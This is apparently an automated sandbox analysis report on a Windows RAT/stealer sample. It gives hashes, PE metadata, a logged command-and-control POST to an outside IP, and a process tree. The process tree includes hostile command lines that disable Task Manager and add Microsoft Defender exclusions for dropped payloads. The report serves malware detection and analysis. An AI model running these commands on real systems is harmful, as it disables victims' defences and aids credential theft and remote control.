                                                                Process:C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):33280
                                                                Entropy (8bit):5.634433516692816
                                                                Encrypted:false
                                                                SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                                MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                                SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                                SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                                SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 12%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                Process:C:\Windows\System32\PING.EXE
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):502
                                                                Entropy (8bit):4.614559420844397
                                                                Encrypted:false
                                                                SSDEEP:12:PhGI5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:pVdUOAokItULVDv
                                                                MD5:1FD9C0E96FA0A2F8D565FE4FB213EB86
                                                                SHA1:7DC87BCD84B5C867509BCC7634A7B5EAF4D1B9F7
                                                                SHA-256:8F90D047643E2E46B67FF76F440B5C3CE391A3204025821D0B76F38BF42C90C8
                                                                SHA-512:7FF19719E6C0F7F8D7CCC277195C039AFE6C1D83D952451CD0FEDCE200CD8538B6B166BE75B633A6842D9111CF8670283BCBFD55F4BB4BCB5D248935494DD742
                                                                Malicious:false
                                                                Preview:..Pinging 138727 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..
                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Entropy (8bit):7.970910105184574
                                                                TrID:
                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                File name:kBY9lgRaca.exe
                                                                File size:3'589'074 bytes
                                                                MD5:3bfa5607ba2fdb912bf3c1b06950be30
                                                                SHA1:09f81b7d75c7c337e8e25303e70f942f52a346c3
                                                                SHA256:abb75d8cf0b557c95d295ebedcc3861cd966bb6bc53deba1d66ed6c3ec7abcde
                                                                SHA512:bd26ccd01ad728fabd51d88359afbb6f60d3a80085c75e6dc4071db006dbe0e2b44a8c55e0f85037b6d7b7646912a40f12ca59d939ce3b8421ea179d1f945940
                                                                SSDEEP:49152:IBJNXBzeEo1tFlwksnSGat746RzF50obO+bbxI2OXI33kM5dlWnBL3rLTfwILm:ynXBaEuDBaat7rJX0KVbxIVXvMLInx0D
                                                                TLSH:99F5235278C485B3D9231D734DA82721743DBE201B6ACEEB63816E9ECA316D0E731B75
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.
                                                                Icon Hash:1515d4d4442f2d2d
                                                                Entrypoint:0x41f530
                                                                Entrypoint Section:.text
                                                                Digitally signed:false
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:5
                                                                OS Version Minor:1
                                                                File Version Major:5
                                                                File Version Minor:1
                                                                Subsystem Version Major:5
                                                                Subsystem Version Minor:1
                                                                Import Hash:12e12319f1029ec4f8fcbed7e82df162
                                                                Instruction
                                                                call 00007FD2212A757Bh
                                                                jmp 00007FD2212A6E8Dh
                                                                int3
                                                                int3
                                                                int3
                                                                int3
                                                                int3
                                                                int3
                                                                push ebp
                                                                mov ebp, esp
                                                                push esi
                                                                push dword ptr [ebp+08h]
                                                                mov esi, ecx
                                                                call 00007FD221299CD7h
                                                                mov dword ptr [esi], 004356D0h
                                                                mov eax, esi
                                                                pop esi
                                                                pop ebp
                                                                retn 0004h
                                                                and dword ptr [ecx+04h], 00000000h
                                                                mov eax, ecx
                                                                and dword ptr [ecx+08h], 00000000h
                                                                mov dword ptr [ecx+04h], 004356D8h
                                                                mov dword ptr [ecx], 004356D0h
                                                                ret
                                                                int3
                                                                int3
                                                                int3
                                                                int3
                                                                int3
                                                                int3
                                                                int3
                                                                int3
                                                                int3
                                                                int3
                                                                int3
                                                                int3
                                                                int3
                                                                push ebp
                                                                mov ebp, esp
                                                                push esi
                                                                mov esi, ecx
                                                                lea eax, dword ptr [esi+04h]
                                                                mov dword ptr [esi], 004356B8h
                                                                push eax
                                                                call 00007FD2212AA31Fh
                                                                test byte ptr [ebp+08h], 00000001h
                                                                pop ecx
                                                                je 00007FD2212A701Ch
                                                                push 0000000Ch
                                                                push esi
                                                                call 00007FD2212A65D9h
                                                                pop ecx
                                                                pop ecx
                                                                mov eax, esi
                                                                pop esi
                                                                pop ebp
                                                                retn 0004h
                                                                push ebp
                                                                mov ebp, esp
                                                                sub esp, 0Ch
                                                                lea ecx, dword ptr [ebp-0Ch]
                                                                call 00007FD221299C52h
                                                                push 0043BEF0h
                                                                lea eax, dword ptr [ebp-0Ch]
                                                                push eax
                                                                call 00007FD2212A9DD9h
                                                                int3
                                                                push ebp
                                                                mov ebp, esp
                                                                sub esp, 0Ch
                                                                lea ecx, dword ptr [ebp-0Ch]
                                                                call 00007FD2212A6F98h
                                                                push 0043C0F4h
                                                                lea eax, dword ptr [ebp-0Ch]
                                                                push eax
                                                                call 00007FD2212A9DBCh
                                                                int3
                                                                jmp 00007FD2212AB857h
                                                                int3
                                                                int3
                                                                int3
                                                                int3
                                                                push 00422900h
                                                                push dword ptr fs:[00000000h]
                                                                Programming Language:
                                                                • [ C ] VS2008 SP1 build 30729
                                                                • [IMP] VS2008 SP1 build 30729
                                                                NameVirtual AddressVirtual Size Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x3d0700x34.rdata
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x3d0a40x50.rdata
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x640000xdff8.rsrc
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x720000x233c.reloc
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x3b11c0x54.rdata
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x355f80x40.rdata
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT0x330000x278.rdata
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3c5ec0x120.rdata
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                .text0x10000x31bdc0x31c002831bb8b11e3209658a53131886cdf98False0.5909380888819096data6.712962136932442IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                .rdata0x330000xaec00xb000042f11346230ca5aa360727d9908e809False0.4579190340909091data5.261605615899847IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .data0x3e0000x247200x10009670b581969e508258d8bc903025de5eFalse0.451416015625data4.387459135575936IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .didat0x630000x1900x200c83554035c63bb446c6208d0c8fa0256False0.4453125data3.3327310103022305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .rsrc0x640000xdff80xe000ba08fbcd0ed7d9e6a268d75148d9914bFalse0.6373639787946429data6.638661032196024IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .reloc0x720000x233c0x240040b5e17755fd6fdd34de06e5cdb7f711False0.7749565972222222data6.623012966548067IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                PNG0x646500xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
                                                                PNG0x651980x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
                                                                RT_ICON0x667480x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.47832369942196534
                                                                RT_ICON0x66cb00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.5410649819494585
                                                                RT_ICON0x675580xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.4933368869936034
                                                                RT_ICON0x684000x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/mEnglishUnited States0.5390070921985816
                                                                RT_ICON0x688680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/mEnglishUnited States0.41393058161350843
                                                                RT_ICON0x699100x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/mEnglishUnited States0.3479253112033195
                                                                RT_ICON0x6beb80x3d71PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9809269502193401
                                                                RT_DIALOG0x705880x286dataEnglishUnited States0.5092879256965944
                                                                RT_DIALOG0x703580x13adataEnglishUnited States0.60828025477707
                                                                RT_DIALOG0x704980xecdataEnglishUnited States0.6991525423728814
                                                                RT_DIALOG0x702280x12edataEnglishUnited States0.5927152317880795
                                                                RT_DIALOG0x6fef00x338dataEnglishUnited States0.45145631067961167
                                                                RT_DIALOG0x6fc980x252dataEnglishUnited States0.5757575757575758
                                                                RT_STRING0x70f680x1e2dataEnglishUnited States0.3900414937759336
                                                                RT_STRING0x711500x1ccdataEnglishUnited States0.4282608695652174
                                                                RT_STRING0x713200x1b8dataEnglishUnited States0.45681818181818185
                                                                RT_STRING0x714d80x146dataEnglishUnited States0.5153374233128835
                                                                RT_STRING0x716200x46cdataEnglishUnited States0.3454063604240283
                                                                RT_STRING0x71a900x166dataEnglishUnited States0.49162011173184356
                                                                RT_STRING0x71bf80x152dataEnglishUnited States0.5059171597633136
                                                                RT_STRING0x71d500x10adataEnglishUnited States0.49624060150375937
                                                                RT_STRING0x71e600xbcdataEnglishUnited States0.6329787234042553
                                                                RT_STRING0x71f200xd6dataEnglishUnited States0.5747663551401869
                                                                RT_GROUP_ICON0x6fc300x68dataEnglishUnited States0.7019230769230769
                                                                RT_MANIFEST0x708100x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333
                                                                DLLImport
                                                                KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
                                                                OLEAUT32.dllSysAllocString, SysFreeString, VariantClear
                                                                gdiplus.dllGdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree
                                                                Language of compilation systemCountry where language is spokenMap
                                                                EnglishUnited States
                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                2024-10-14T17:23:18.164609+02002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.74989891.199.45.18780TCP
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Oct 14, 2024 17:22:56.770483971 CEST4989880192.168.2.791.199.45.187
                                                                Oct 14, 2024 17:22:56.775530100 CEST804989891.199.45.187192.168.2.7
                                                                Oct 14, 2024 17:22:56.775609016 CEST4989880192.168.2.791.199.45.187
                                                                Oct 14, 2024 17:22:56.776237011 CEST4989880192.168.2.791.199.45.187
                                                                Oct 14, 2024 17:22:56.781096935 CEST804989891.199.45.187192.168.2.7
                                                                Oct 14, 2024 17:22:57.124506950 CEST4989880192.168.2.791.199.45.187
                                                                Oct 14, 2024 17:22:57.129616976 CEST804989891.199.45.187192.168.2.7
                                                                Oct 14, 2024 17:23:18.164510965 CEST804989891.199.45.187192.168.2.7
                                                                Oct 14, 2024 17:23:18.164608955 CEST4989880192.168.2.791.199.45.187
                                                                Oct 14, 2024 17:23:18.172642946 CEST4989880192.168.2.791.199.45.187
                                                                Oct 14, 2024 17:23:18.177422047 CEST804989891.199.45.187192.168.2.7
                                                                • 91.199.45.187
                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.74989891.199.45.18780576C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 14, 2024 17:22:56.776237011 CEST308OUTPOST /eternalgameSqlflowerDownloads.php HTTP/1.1
                                                                Content-Type: application/octet-stream
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                Host: 91.199.45.187
                                                                Content-Length: 344
                                                                Expect: 100-continue
                                                                Connection: Keep-Alive
                                                                Oct 14, 2024 17:22:57.124506950 CEST344OUTData Raw: 00 01 04 01 03 0a 01 0a 05 06 02 01 02 04 01 0b 00 07 05 0f 02 07 03 0c 00 02 0d 07 04 50 01 57 0a 01 03 0d 02 56 06 07 0e 06 04 06 05 56 04 04 06 53 0b 0b 0a 03 04 0a 04 02 07 54 06 05 05 0f 01 02 0f 5d 00 02 05 06 0e 0e 0c 0f 0d 03 0c 02 07 03
                                                                Data Ascii: PWVVST]]WWVW\L~|^P@wmuvcThliMwRU^hM^{|gx`j|}{Pwtw\i_~V@@z}f}La


                                                                Click to jump to process

                                                                Click to jump to process

                                                                Click to dive into process behavior distribution

                                                                Click to jump to process

                                                                Target ID:0
                                                                Start time:11:22:17
                                                                Start date:14/10/2024
                                                                Path:C:\Users\user\Desktop\kBY9lgRaca.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\kBY9lgRaca.exe"
                                                                Imagebase:0xcb0000
                                                                File size:3'589'074 bytes
                                                                MD5 hash:3BFA5607BA2FDB912BF3C1B06950BE30
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1300294419.0000000004E3F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:2
                                                                Start time:11:22:18
                                                                Start date:14/10/2024
                                                                Path:C:\Windows\SysWOW64\wscript.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\RuntimeDll\PBs3ExWWgPs.vbe"
                                                                Imagebase:0xc20000
                                                                File size:147'456 bytes
                                                                MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:5
                                                                Start time:11:22:34
                                                                Start date:14/10/2024
                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\RuntimeDll\er5JwegoF0epdZ7Hiy1grVzXqFtCRJ8c.bat" "
                                                                Imagebase:0x410000
                                                                File size:236'544 bytes
                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:6
                                                                Start time:11:22:34
                                                                Start date:14/10/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff75da10000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:7
                                                                Start time:11:22:34
                                                                Start date:14/10/2024
                                                                Path:C:\Windows\SysWOW64\reg.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                                                Imagebase:0x360000
                                                                File size:59'392 bytes
                                                                MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:8
                                                                Start time:11:22:34
                                                                Start date:14/10/2024
                                                                Path:C:\RuntimeDll\cef_process.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\RuntimeDll/cef_process.exe"
                                                                Imagebase:0xb10000
                                                                File size:3'728'384 bytes
                                                                MD5 hash:C73DF0A231280439C24218C394E0A546
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000000.1459515251.0000000000B12000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000008.00000002.1574023046.00000000135E7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\RuntimeDll\cef_process.exe, Author: Joe Security
                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\RuntimeDll\cef_process.exe, Author: Joe Security
                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\RuntimeDll\cef_process.exe, Author: Joe Security
                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\RuntimeDll\cef_process.exe, Author: Joe Security
                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\RuntimeDll\cef_process.exe, Author: Joe Security
                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\RuntimeDll\cef_process.exe, Author: Joe Security
                                                                Antivirus matches:
                                                                • Detection: 100%, Avira
                                                                • Detection: 100%, Joe Sandbox ML
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:9
                                                                Start time:12:34:59
                                                                Start date:14/10/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe'
                                                                Imagebase:0x7ff741d30000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:10
                                                                Start time:12:34:59
                                                                Start date:14/10/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft\OneDrive\ListSync\settings\mOBsSQwwQhAobhYfNDABCsnt.exe'
                                                                Imagebase:0x7ff741d30000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:11
                                                                Start time:12:34:59
                                                                Start date:14/10/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff75da10000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:false

                                                                Target ID:12
                                                                Start time:12:34:59
                                                                Start date:14/10/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\RuntimeDll\mOBsSQwwQhAobhYfNDABCsnt.exe'
                                                                Imagebase:0x7ff741d30000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:13
                                                                Start time:12:34:59
                                                                Start date:14/10/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff75da10000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:false

                                                                Target ID:14
                                                                Start time:12:34:59
                                                                Start date:14/10/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windowspowershell\Modules\lsass.exe'
                                                                Imagebase:0x7ff741d30000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:15
                                                                Start time:12:34:59
                                                                Start date:14/10/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff75da10000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:false

                                                                Target ID:16
                                                                Start time:12:34:59
                                                                Start date:14/10/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\java\jre-1.8\bin\RuntimeBroker.exe'
                                                                Imagebase:0x7ff741d30000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:17
                                                                Start time:12:34:59
                                                                Start date:14/10/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff75da10000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                Target ID:18
                                                                Start time:12:34:59
                                                                Start date:14/10/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff75da10000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                Target ID:19
                                                                Start time:12:35:00
                                                                Start date:14/10/2024
                                                                Path:C:\Windows\System32\cmd.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\0MaLlOrxiN.bat"
                                                                Imagebase:0x7ff785e40000
                                                                File size:289'792 bytes
                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:20
                                                                Start time:12:35:00
                                                                Start date:14/10/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
